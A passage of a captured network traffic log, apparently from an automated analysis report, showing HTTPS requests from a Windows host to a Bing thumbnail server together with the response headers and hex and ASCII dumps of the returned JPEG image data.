vszGO+9aug-+[bO?wGCPTfF\>Mi$Kp:XEY}9r\QJ
2024-12-16 10:25:13 UTC	8192	IN	Data Raw: 36 1e 13 d0 ed 65 b3 1a 35 cb 09 3f 7a cb 1a bb 79 99 e8 1d d9 b2 7d 3a 56 3e ab e2 9d 1a 08 ee ac ed b4 06 8e da 58 02 6e dc f2 2a c8 7f 88 a0 ce 02 8f d6 ac 5b e8 1a 46 b5 af 5c de 37 87 f5 0b 3b 85 89 52 58 a4 bd e5 90 75 29 82 40 fa 9a ca d4 bc 31 6d a6 78 92 f2 eb 42 5b bd b3 c2 b0 ac 51 b7 fc b4 03 76 e7 3c ef 5c 71 d8 d5 45 46 fa b0 d6 c5 4d 04 e8 fa 2e 93 1a 69 0b 26 b1 33 4a 5e e6 59 ed 8b b3 1c 64 79 41 ff 00 87 b7 6a af e1 3f 10 5c 6a 7e 26 92 df 54 b3 5d 32 c7 99 3e c9 23 3e 66 39 c0 dc 0e 42 fd 01 a7 ea a9 e2 35 ba b3 b3 d2 ee 74 d8 e2 66 32 6e 96 01 1b b6 d1 92 81 86 31 df ad 3e fe 4f 08 78 92 dd b4 3b 7f 14 5d c3 fb 8f 37 ed 30 49 24 6f 1b 8f bc 37 3f 1d 7d eb 6d 2c 49 b7 36 ab e1 bb 89 1a d2 2b eb 2b 1f 35 4c 72 c0 d1 8f b4 b1 3f f3 cc fa Data Ascii: 6e5?zy}:V>Xn*[F\7;RXu)@1mxB[Qv<\qEFM.i&3J^YdyAj?\j~&T]2>#>f9B5tf2n1>Ox;]70I$o7?}m,I6++5Lr?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49794	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:14 UTC	346	OUT	GET /th?id=OADD2.10239381687775_1ATJGWTGK72EI5PK1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-16 10:25:14 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 728621 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 982E43EDB7EC47739C0C6A5A26AC08FF Ref B: EWR30EDGE0821 Ref C: 2024-12-16T10:25:14Z Date: Mon, 16 Dec 2024 10:25:14 GMT Connection: close
2024-12-16 10:25:14 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 04 04 04 04 05 09 06 05 05 05 05 0b 08 08 06 09 0d 0b 0d 0d 0d 0b 0c 0c 0e 10 14 11 0e 0f 13 0f 0c 0c 12 18 12 13 15 16 17 17 17 0e 11 19 1b 19 16 1a 14 16 17 16 ff db 00 43 01 04 04 04 05 05 05 0a 06 06 0a 16 0f 0c 0f 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 ff c0 00 11 08 07 80 04 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIFCC8"}!1AQa"q2
2024-12-16 10:25:14 UTC	16384	IN	Data Raw: e7 3d f1 5d c6 b7 e2 1d 47 c5 3a f5 e5 8d 86 ab 24 b6 91 e8 6e 12 65 8b ef c6 1d 9f f7 84 e0 b3 82 70 18 72 03 63 a0 ae 6b c5 16 c6 ca 0b 1b b8 34 c8 21 8e 2b 51 15 b4 aa e7 70 38 da 55 8f 47 6f 99 b0 47 38 eb d3 35 4a c2 f6 db 46 f0 7b 34 70 c8 ba 87 90 60 8e 46 25 95 63 24 ee 65 f7 01 88 c7 24 64 7a d6 4d 2a 96 92 dc 4d 5e cc 8e c2 0b fb fb 7d 62 58 95 d6 ea 38 91 1a 16 5d d9 60 79 38 fe 23 81 c7 72 4d 43 0f c4 6f 13 59 d9 6b 1a 6b de 37 d8 f5 34 10 cc bb 15 4c 98 c0 e4 80 08 20 0e 31 d3 9f 53 5b 9e 0e b9 9a c7 c2 f7 b2 e9 c6 49 b5 0b 59 23 96 7f 35 81 68 e7 38 11 80 df c4 9b 5d 86 3d 40 ac 3f 15 26 94 af 6f 14 ba 23 ab 32 ee 9a 58 a6 f9 a3 c7 46 6e d9 c6 72 0f 3c 56 b0 e5 94 9a 92 d8 b4 93 dd 18 ba 75 cc f6 f3 21 37 0a 8b 09 52 8a 17 e6 42 7e 5e 0f 61 Data Ascii: =]G:$neprck4!+Qp8UGoG85JF{4p`F%c$e$dzM*M^}bX8]`y8#rMCoYkk74L 1S[IY#5h8]=@?&o#2XFnr<Vu!7RB~^a
2024-12-16 10:25:14 UTC	16384	IN	Data Raw: f4 f9 64 96 d2 de e6 4b 36 87 cc 37 71 32 db 23 f5 de ab c1 23 9e 49 3c 13 8c 57 95 68 5e 23 78 35 2b 84 1e 67 95 30 0b 3c 2c 3f 78 23 ce 15 81 60 72 c3 3c 37 6a e8 f4 91 65 6f 32 c3 32 49 f6 19 65 3e 5d bd c4 ca d3 ed 19 04 ef 00 2b 36 0e 31 81 93 ce 2a 2a 60 a2 a5 cc d0 d5 38 35 73 5b c3 1a 6e 9b a4 99 af 61 ba b7 79 26 b2 db 67 70 92 7d 9e d8 ae ef 99 dc b6 48 1f 21 f9 50 6e 3e d9 06 b5 ac 4c 31 5c c8 cf a8 41 7c d6 d3 c4 90 49 0f 96 d0 5b ee 51 23 1f 29 be 63 19 04 e5 fa 82 46 7b d6 77 89 75 9b db cb a8 17 57 b4 69 ad 56 01 1e 9f 6b 14 2a b2 2a 05 f2 d2 53 fd f6 e0 0e c0 e0 d7 29 6b 7b a9 d8 78 aa 3d 36 ce 01 35 f5 d2 2d b6 5a 3e 21 1d 5b 29 d8 7c bc f4 e0 1a c2 a5 07 55 36 dd 9e ff 00 d3 fc cc e5 4c 3c 5d e2 99 2c ae a5 92 c3 48 97 4b 92 3d 46 4b e3 Data Ascii: dK67q2##I<Wh^#x5+g0<,?x#`r<7jeo22Ie>]+61`85s[nay&gp}H!Pn>L1\A\|I[Q#)cF{wuWiVkS)k{x=65-Z>![)\|U6L<],HK=FK
2024-12-16 10:25:14 UTC	16384	IN	Data Raw: 5e cc 78 6a ca d7 5a 9e c6 d6 e9 6c ae 7e d7 67 63 2b 6e 8e ec 2b a4 92 45 3a be 00 04 21 2a 7a fc c7 e9 51 4e 7c cf 53 a6 b5 1e 48 bb 6c 6c 58 78 a8 f8 5b c5 36 fa 37 89 23 9d ce 8a 15 ec fc 3b 2b 0f b3 4f 7b 90 cb 22 1c 1d ae 8d fb cd d9 da 41 e3 ad 66 f8 b8 1b 8f 1a cd e2 78 35 4b 38 67 bd 55 11 6a 16 eb e5 c4 48 58 d0 89 7b 4c f9 91 89 23 05 70 0b 0e f4 df 8b e3 47 d7 74 ed 17 5e d3 64 12 69 c2 c4 2d ba 47 03 ac d6 56 ea 37 22 48 e7 a9 f9 a4 01 b8 05 57 da b8 f9 ee 60 d5 fc 05 67 65 6d 04 d0 dd 42 e5 a3 5f 37 31 c7 e6 48 15 64 19 ce e2 a0 1d e7 a9 5f ce 8a 74 db 6e 49 bf f2 39 b1 13 9c 13 a3 cd 78 e8 ff 00 0f f8 27 55 78 6f ec 35 9d 36 7d 46 70 26 b8 b9 96 e3 f7 e1 64 f3 8a e1 19 d5 c6 46 09 09 f2 f2 08 63 8e 95 62 e2 d3 55 93 c5 2f 61 2d a4 36 f1 c3 Data Ascii: ^xjZl~gc+n+E:!*zQN\|SHllXx[67#;+O{"Afx5K8gUjHX{L#pGt^di-GV7"HW`gemB_71Hd_tnI9x'Uxo56}Fp&dFcbU/a-6
2024-12-16 10:25:14 UTC	16384	IN	Data Raw: ae 3a 74 eb 5d d7 87 2f 35 5b 5f b5 1b c8 a3 66 9a ca 09 59 64 93 6b 43 1b 33 6d c7 af ca 3a 73 9e 7a 62 b8 6f 13 5d 37 db 27 33 f9 6b 3a a2 2a 2b 2e d6 23 fc 39 e9 db 15 d2 41 aa ce de 18 9b 4a bf 76 6b a4 b0 b3 7d 36 79 3e 67 de 9b 84 90 0e f8 62 fb b9 c0 f9 7b 66 8a b4 79 a1 62 a0 f5 3a dd 16 0d 2a 58 52 68 a1 b5 b7 12 2a ac c2 00 77 5c 80 4e 65 71 dd c6 e0 0b 70 58 7b 8c d7 59 e2 1b 91 6d e1 94 6d 3a fe de da f6 df 4f 91 a6 6b e6 6c 4b 97 db e6 28 3c 16 2a 71 83 9e 3d 7a d7 11 e0 3b 18 e1 11 e9 da 84 17 5a 76 a0 81 e6 42 1b 96 47 0a 42 14 3c 29 1b 7e a4 37 6e 33 b1 78 ba 68 84 be b3 a7 49 75 a7 cc fb 61 2f 19 91 95 9b a0 52 31 97 19 ca 9e 06 54 03 d6 bc ca 95 25 49 28 a7 a6 c7 67 2d e0 37 c3 9a 9a 5d 5b dc 20 ba 87 49 9b c9 5b 2b bd 25 97 72 cc d8 50 Data Ascii: :t]/5[_fYdkC3m:szbo]7'3k:+.#9AJvk}6y>gb{fyb:XRhw\NeqpX{Ymm:OklK(<q=z;ZvBGB<)~7n3xhIua/R1T%I(g-7][ I[+%rP
2024-12-16 10:25:14 UTC	16384	IN	Data Raw: 08 18 07 eb 9a 74 d7 16 3a ec 71 d8 4a f3 db 5c 47 75 fb 99 8a e7 f7 0d 9c 97 23 97 db 91 c7 75 f5 c5 5e f1 17 85 3c 59 e1 7b 60 2f 34 b1 25 9d a5 d3 24 b7 70 3a b4 72 f3 f2 c8 84 1e 55 86 30 d8 c7 35 d3 4f 92 0a 30 a8 f5 e9 7f eb 71 5c d0 f0 e4 ba 6e ac b7 46 da d5 6c 6e 74 f8 a3 91 5d 24 ff 00 8f 9d ac 00 59 53 a3 3e 4f de e0 e0 e3 b0 35 df 4f 6d a4 6b 7a 1e 97 ac cf 63 1d 8f da 99 d2 ea 7f 2b 6c 56 b3 af ca c3 be 4b 28 07 27 04 73 f5 ae 36 e0 62 da 6d 66 2d 26 d7 ed 11 ac 11 b3 5b 33 0d ae 58 6e 66 53 d4 60 2f 3f c2 47 b9 15 d7 59 6b ba 6f 85 e0 b0 9e e7 52 fe d2 b2 49 9a 7b fb 55 05 52 fd 5a 5d bc c4 fd 59 76 f5 cf 53 ce 01 aa 75 2d 25 73 58 bd 0e 0f e2 97 87 2d ad f5 12 f6 66 e3 64 72 06 17 2f 07 96 ae dd 76 00 3a 0c 63 07 d7 f2 ab 7e 0f f1 9f 88 34 Data Ascii: t:qJ\Gu#u^<Y{`/4%$p:rU05O0q\nFlnt]$YS>O5Omkzc+lVK('s6bmf-&[3XnfS`/?GYkoRI{URZ]YvSu-%sX-fdr/v:c~4
2024-12-16 10:25:14 UTC	16384	IN	Data Raw: 72 8a ff 00 80 6f cb 74 7a e7 c3 d1 a1 78 5f c7 ba 96 93 e1 0d 4a 5d 4b c5 b6 45 e3 9e 4b bf f4 7b 3b f2 57 74 ed 11 e3 ca 28 43 6c dd 90 77 7a 91 5c 97 88 f5 5b 6d 2b 48 d4 f4 cf 1c f8 17 58 ba 9b 56 be 96 f7 4e 9a f7 54 31 c9 a7 97 5e 0a 01 9d ce 17 cb c8 6f 94 8c f1 c8 ae 4b c4 9a 35 fd 8c 0b 7a f3 49 27 98 f8 69 49 2c d2 9f 73 df dc f6 ac ed 67 52 d4 f5 ad 56 5b dd 52 f6 5b 8b cb 89 77 65 8f ca 5b 00 71 d9 47 0b ec 00 15 14 70 51 e7 e7 72 bd ed 77 aa 7a 79 ab 69 e5 f2 d8 9f 66 d4 ae cc d8 d0 18 bc b9 4b 6e 24 2e 63 fb a4 f5 27 e9 ed 5b 3e 0b d2 24 d4 6e 8e cb 7b 4b 8d e5 a0 b5 8a fa ef ec f1 4d 2e 09 3b 8f 19 40 a1 b2 72 17 a6 4f 6a a9 a0 ad ba 78 82 d8 6a b1 db c7 6e d7 1e 5c f2 5d 87 68 63 18 ea eb 19 dc c1 73 9d a3 1b 88 03 8c 9a f4 7b c5 f0 16 b9 Data Ascii: rotzx_J]KEK{;Wt(Clwz\[m+HXVNT1^oK5zI'iI,sgRV[R[we[qGpQrwzyifKn$.c'[>$n{KM.;@rOjxjn\]hcs{
2024-12-16 10:25:15 UTC	16067	IN	Data Raw: d5 74 29 ad 35 5d 27 4d 96 f9 27 10 2d e2 4a b1 dd 25 ab 63 6a c2 01 f9 c1 ce 0a 12 77 0f 4c 92 78 61 51 c6 7e f3 d1 85 d9 b9 6b e3 2b 58 7c 1d 26 8b ad de da ae 97 a6 c4 b2 5b e9 8c 93 45 0d db ac a4 39 b4 9d 4e 5e 50 a7 3f 2f c8 73 85 e9 5c 5f c6 8d 22 d2 7f 1e b7 88 f4 6d 47 45 fe c6 98 89 74 b7 94 79 b2 4a cc 03 b4 53 aa e0 b1 40 1f 1b b2 d8 c8 3d 45 6a 68 b2 e9 32 d9 69 5e 27 97 c2 57 f6 3f 60 93 c8 d4 16 58 ce c2 aa cc ac 8b 11 ca 6c 31 8d ac 9d 77 1c f1 8a e7 fc 4c 90 5c eb f6 70 69 eb 63 71 1e 99 68 6d dd 65 98 41 1b 47 cc c2 47 6c 93 bd 7c c5 5c 28 cb ed e3 a1 34 dc 94 1b b7 cc 66 4f c4 e9 ec 75 1d 26 d6 fa 5d 2a 39 2d 56 02 b0 eb 76 8e ec d7 a5 40 65 89 94 e3 cb f2 f2 40 42 32 a7 23 2d 83 8f 3c 86 de e6 5b 46 d7 51 e4 b7 48 fc b5 85 77 6d 29 22 Data Ascii: t)5]'M'-J%cjwLxaQ~k+X\|&[E9N^P?/s\_"mGEtyJS@=Ejh2i^'W?`Xl1wL\picqhmeAGGl\|\(4fOu&]*9-Vv@e@B2#-<[FQHwm)"
2024-12-16 10:25:15 UTC	16384	IN	Data Raw: 4f b7 9a c6 c7 cb c9 79 94 f2 e1 dd 46 0a 9e 18 60 7c b8 06 a7 d1 f4 4b 84 d4 6e ef 2c 75 cb 5d 53 40 d7 a2 36 f6 5a 85 a3 9b 6b ab ac 36 54 81 1b 06 91 22 97 fe 59 b6 5d 46 71 9c e0 e3 5d f8 e6 fc eb 16 76 86 1b ad 3e ca 3b 84 b9 b7 f0 b6 87 33 6d f2 39 3e 68 b8 8d 09 69 06 dd ee d8 da 70 7b 0a e8 ee 2c bf b6 e4 b3 1a f5 f9 5b ef 0f dd 7d a8 ea 11 59 89 3e c8 cf 89 04 6c 89 b7 cf 57 4c e2 68 c6 37 28 04 f0 45 78 b5 6f 1a ce 72 56 e6 fe bf ab 7e 27 1b 7c d2 b9 e7 1e 2f d0 75 5d 23 47 3a ce 8f 65 64 f0 69 eb 2d ad e2 a3 23 4d 06 d6 07 cc 45 38 6d 8c 49 70 db 79 04 fa 62 ae 7c 28 b4 69 74 e5 b5 bb b4 72 cf b9 64 ba 87 ee dc af 55 e7 3f 31 19 ce 47 07 f4 ae 8f e2 e4 6c 34 89 84 1a 8a df 36 b1 98 26 9a 75 db 70 91 b6 df 26 5d a7 ee 77 5d 9d 06 73 c6 6a 87 83 Data Ascii: OyF`\|Kn,u]S@6Zk6T"Y]Fq]v>;3m9>hip{,[}Y>lWLh7(ExorV~'\|/u]#G:edi-#ME8mIpyb\|(itrdU?1Gl46&up&]w]sj
2024-12-16 10:25:15 UTC	16384	IN	Data Raw: 37 93 ce d7 44 c6 32 a0 11 86 3c 83 8f ad 74 d3 58 5b 68 16 b1 c8 e6 f2 e3 47 82 55 bb d2 3c d9 d8 ae c7 c6 f4 2a c3 e7 4e 4e 0a fc a4 73 c1 06 aa 78 f2 cd 23 f1 04 92 5f 58 ad c2 dd 3b 46 97 90 cc 7c c9 61 74 f9 62 20 00 aa cb 8c f7 2d 9f 7a 98 49 26 2d 4b bf 10 7c 55 7d f1 27 4b 68 2f 35 5f b7 f8 a2 37 69 da 15 58 e2 b7 30 aa e5 9a 26 18 59 0b 80 09 5e b9 52 47 a0 e1 e6 8a f8 f8 7a c7 55 bb 8e 49 6d 75 16 75 82 79 1b 72 c2 51 f6 b7 d5 79 c6 73 c7 1d 2b 6b 52 f0 2c f6 da 0e 9b aa dc cd 25 e5 d4 97 0d 1a b3 2a f9 29 c0 d8 8c 07 cc 18 10 32 1b 8e 46 2b 9d b1 3a 9e a7 0d d6 9b 7b 32 99 ae 64 92 58 51 89 45 46 c7 cc a1 40 da 03 6d 1d 00 e5 7d eb 5a 72 4f 54 ee 4b 36 88 f1 1c de 18 d3 74 8b 8b 58 db 45 91 a5 36 37 0a a3 68 95 a4 1b d6 36 eb b8 95 5f 97 a1 af Data Ascii: 7D2<tX[hGU<NNsx#_X;F\|atb -zI&-K\|U}'Kh/5_7iX0&Y^RGzUImuuyrQys+kR,%)2F+:{2dXQEF@m}ZrOTK6tXE67h6_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49795	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:14 UTC	346	OUT	GET /th?id=OADD2.10239381687776_1QZR1YSB08WBPILZM&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-16 10:25:14 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 796768 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 1C90E203FCD446B4851BB429E124041D Ref B: EWR311000104031 Ref C: 2024-12-16T10:25:14Z Date: Mon, 16 Dec 2024 10:25:14 GMT Connection: close
2024-12-16 10:25:14 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 04 04 04 04 05 09 06 05 05 05 05 0b 08 08 06 09 0d 0b 0d 0d 0d 0b 0c 0c 0e 10 14 11 0e 0f 13 0f 0c 0c 12 18 12 13 15 16 17 17 17 0e 11 19 1b 19 16 1a 14 16 17 16 ff db 00 43 01 04 04 04 05 05 05 0a 06 06 0a 16 0f 0c 0f 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIFCC8"}!1AQa"q2
2024-12-16 10:25:14 UTC	16384	IN	Data Raw: 18 65 b6 57 3c 43 b7 38 79 98 9c ed 3c 20 c9 63 9e 2b a0 f8 6f 0e b3 66 ad 0e 8d a5 c9 0c 77 93 88 f5 2b eb a6 30 dc 5c c4 10 e3 64 e4 ef 51 b8 93 85 fb c1 00 1c 1a f7 aa 61 f9 21 29 e2 de 97 7d 6c ad d3 f0 e9 bf a2 d4 85 0d 75 32 6e ac b5 17 d4 67 be d4 20 86 da fe d6 4f 30 42 f9 02 20 79 6d 89 d5 e4 24 fc f2 b7 cc 73 80 00 ae 8b c1 96 0b 15 95 ee b7 77 22 4d 77 24 86 04 95 e2 f2 9e 32 46 5f 86 c6 d5 e4 00 4f 61 5b da 5c f7 fa 6d 9c 76 7a 16 96 bf 68 c6 df b6 df 00 27 b8 63 d5 ca a7 cc 01 3c e3 20 01 5d 1d e7 f6 57 85 3c 3d f6 8f 12 c7 6f a8 eb 13 7e f2 4d d0 8f 26 d1 71 d0 26 70 49 ee c7 24 e2 b8 ab e6 55 71 90 74 a3 1b 45 f5 be ad 2e 96 e9 7f 5e e5 4a 76 7a 9c 16 bd e1 bd 1b c4 7a f0 d4 a2 d4 e4 ba 82 18 05 ba 49 6e 84 c3 2a 8f ba 63 0c 03 63 04 83 bb Data Ascii: eW<C8y< c+ofw+0\dQa!)}lu2ng O0B ym$sw"Mw$2F_Oa[\mvzh'c< ]W<=o~M&q&pI$UqtE.^JvzzIn*cc
2024-12-16 10:25:15 UTC	16384	IN	Data Raw: de b7 ae c9 7d a7 6e fb 44 c9 1c 10 d9 2a 24 7d 01 94 a9 f9 42 e4 61 57 e6 27 03 02 b6 ad 4f 0b 87 f7 30 ef de da ef 7f 3b 2b 3d fc 9e bb 77 2d c5 58 f3 6f 80 96 7a 65 b7 8d bc 43 16 b2 27 8d b6 ee b7 b8 78 cb 62 16 04 23 29 1c 7d e0 4e 38 00 e0 e3 15 cf 6a 11 c1 6f 79 7a d0 c8 b6 b1 c1 21 8a 3b 9b 87 f2 b1 bb 3f 33 6e c1 18 5c 92 7a 7a 75 15 e9 3e 21 d0 3c 31 a5 58 0d 54 78 bb c4 8b 14 b0 96 b6 b5 58 22 df a8 3c 9f ea 6d ad 01 50 d2 31 0c e0 9d a0 29 5c 9c 0a e6 24 d0 f5 bd 7f 54 80 f8 9d ed 6e 75 20 00 d3 34 89 0a bc 76 f8 e1 16 e6 50 00 99 d5 42 8f ee 02 33 8a f6 15 3c 1d 2a 8f 11 56 a3 bc b9 56 b7 dd 2e 9a 6d d5 bd 90 72 c7 4b bd 8c 3d 32 d1 3c 51 ac c1 22 dd 14 f0 d4 b2 e3 ca fb 3c 9f 69 d4 15 50 06 2d 04 67 7e c0 bc 00 4a ef db d8 66 bd 5e e7 c1 fa Data Ascii: }nD$}BaW'O0;+=w-XozeC'xb#)}N8joyz!;?3n\zzu>!<1XTxX"<mP1)\$Tnu 4vPB3<VV.mrK=2<Q"<iP-g~Jf^
2024-12-16 10:25:15 UTC	16384	IN	Data Raw: b4 2e a2 d4 bc 0d e1 db 18 a7 d3 14 69 cd 32 08 e3 4b c0 2d a3 90 10 cb 71 24 a3 fd 74 8e 15 81 46 0a 14 60 28 3d 6b 8b f1 e7 8a bc 51 f1 2b c4 cc 52 da 6b b8 c2 98 92 49 90 c7 6b 6f 10 fe 04 07 80 bf 4c 92 4d 2c 3e 19 4a a7 ee 67 7a 0b ed 5f b3 ef eb 7d 5d bc 93 5a 91 29 5d 6a b5 38 1d 7b 5b d4 bc 41 7b 27 92 d2 c1 68 bf 72 21 26 d5 45 fe f3 b7 a9 fd 3a 57 63 f0 d3 c0 1a ac 36 d1 f8 8e f6 c3 6c 0d 1a f9 09 32 ba b3 ef 1f 29 05 4e 54 9e 08 3d f2 2b 6b 5a f0 a6 91 a0 78 1f cd b2 69 e4 d5 da c5 a2 bc b8 70 04 29 24 d3 24 28 6d a3 c7 00 24 8c 09 6f 98 93 c6 2b b1 f8 a9 e2 ff 00 0e 78 7f c1 f0 db 5c cb 23 43 72 ae 96 90 a2 e6 4b 81 06 23 11 15 fb c8 49 18 cb 74 c1 3c d7 b5 8b c5 d7 a9 4a 8d 1c 0c 3d da 8d ab db 64 b7 fb f5 7d f4 ee 4a a7 cb f1 1c 17 c4 a3 af Data Ascii: .i2K-q$tF`(=kQ+RkIkoLM,>Jgz_}]Z)]j8{[A{'hr!&E:Wc6l2)NT=+kZxip)$$(m$o+x\#CrK#It<J=d}J
2024-12-16 10:25:15 UTC	16384	IN	Data Raw: f6 1c 2c b1 34 c4 1b 77 20 1f 2c 83 d3 19 ea 7f 1a fa 0f c6 df f0 8f d8 de 7f c2 48 f2 3b 5a d9 df 42 ba 26 97 0b 96 2e 5b 2f 34 a4 af fa c5 59 3e e2 3e 46 5b 70 c5 79 36 a5 a8 59 df f9 da 6c f1 59 c9 6a d7 0f 76 9a 84 f8 69 7a ee 57 93 6f 20 80 0a b0 5d c0 e7 a7 39 af 56 8e 26 aa 9a 5c be ea eb fd 6f 6f bc d1 4a 49 6d a1 e5 b2 31 5b ac 23 2f ca ec 1c 67 8c 13 83 8f af 5a d8 17 d3 5a e8 ff 00 60 8e ce d2 58 66 90 5c bb 95 db 3b 14 1b 55 3c cc f0 8a 32 db 47 05 8e 4e 78 c4 be 31 b2 b6 b9 d5 a6 78 e4 0f 75 2c 2b 3c 8d bc 03 bb 3c 92 a3 80 0f 61 e8 28 d3 f4 db 5d 3a 25 b9 d5 ad cc ad 3b ed b7 33 67 c9 4c e7 32 12 a7 24 8c 60 0e 87 39 af 53 da 29 41 3b 15 7b ab 99 37 9f 6e 9b 51 93 12 45 1c b1 42 7f 79 1f dd 74 23 21 48 ec 70 70 73 57 b4 4b 63 79 25 9d ba 5d Data Ascii: ,4w ,H;ZB&.[/4Y>>F[py6YlYjvizWo ]9V&\ooJIm1[#/gZZ`Xf\;U<2GNx1xu,+<<a(]:%;3gL2$`9S)A;{7nQEByt#!HppsWKcy%]
2024-12-16 10:25:15 UTC	16384	IN	Data Raw: 0d 6d 78 93 c3 e3 4c ba 68 99 ec cc 5a 74 4c 97 66 d9 99 96 45 89 4b 15 1c 1e 18 a8 f9 8f f1 6d ed c5 65 78 0f 44 87 56 f1 39 bd 9b 51 6b 6b 12 d2 3a 5b c8 86 39 85 c4 91 e2 2f 30 67 93 93 96 00 71 c6 6b be 33 53 8b b3 26 11 8b 92 b9 cf 6b 9a 75 af 9f aa 4f 1b c2 b0 de 05 53 1a cb f7 93 6e e2 19 47 70 c8 38 f7 aa fa 84 b6 63 e1 ec 7a 65 85 f4 7f 6a 7d 5e 46 6b 05 80 86 11 65 19 5c cd c0 e4 c8 76 af 38 00 f2 3a 56 ae a5 67 6b 1e bc f0 5c 5a a8 b8 b9 b6 31 dc 2c 48 02 bc a1 46 1f 23 a0 2c 3b 74 04 91 cd 66 5f 69 b7 ad 6e d6 fa bb c0 cc 62 26 09 07 05 33 96 28 1c fd ec 75 23 d0 66 ba 63 38 c9 46 ef 6b 32 5d 91 d2 dc 79 9a 4d 85 ac fa 60 8d 96 da e1 26 b7 4b 84 57 85 98 00 ac b3 01 9e 5b 0d b4 1e 38 e3 06 ba 4f ed 2d 33 c4 16 d6 f0 5d b2 f9 71 db bc 3a dd 8d Data Ascii: mxLhZtLfEKmexDV9Qkk:[9/0gqk3S&kuOSnGp8czej}^Fke\v8:Vgk\Z1,HF#,;tf_inb&3(u#fc8Fk2]yM`&KW[8O-3]q:
2024-12-16 10:25:15 UTC	16384	IN	Data Raw: d6 b3 e9 ef 14 84 82 23 e0 ce a3 a7 f7 3e 61 ce 38 c5 41 1d 9e 8f f1 8b 4d d4 bc 43 72 df d9 de 26 6b 68 ee e5 86 37 52 b7 05 8e d2 ea 83 97 88 88 c9 23 92 bb 79 ec 6a 28 d1 a7 c8 a5 1d 85 cc af a1 8d a3 5a 6b 9a 06 8f 3d b4 1e 27 d3 6f 22 bf 45 92 ea 3b 75 17 32 c5 34 92 06 40 b8 20 05 3c 2e 7a e0 93 8e 2b a7 b7 b1 d4 bc 55 35 8e 9f 2d 8b 6e d0 2d a6 51 6f 1b 34 92 14 0d bb 2d 8e 8a c7 3c 9e 32 3a d7 1f e3 cf 0a d9 78 13 c4 1a 6b 69 b2 ad d4 ba 84 0b 71 23 b4 a5 95 b9 cb 22 c6 54 15 20 80 ca d9 39 56 e9 5b be 11 d4 ee 75 0f 0e c3 a8 5c 5f 47 62 b2 47 8b 78 a2 70 3e d4 92 4a ca 63 8f 6f cd 90 c4 92 a4 e0 11 91 cd 6b 35 2b 5e 24 ea 65 6a 5e 16 90 dd 49 7f 69 a6 dd d9 e9 eb 1b 2a 3c cc 24 f3 e3 ce e5 50 ff 00 78 9c 74 03 a1 18 e9 91 59 36 7a 1c ba 4b 8d 4f Data Ascii: #>a8AMCr&kh7R#yj(Zk='o"E;u24@ 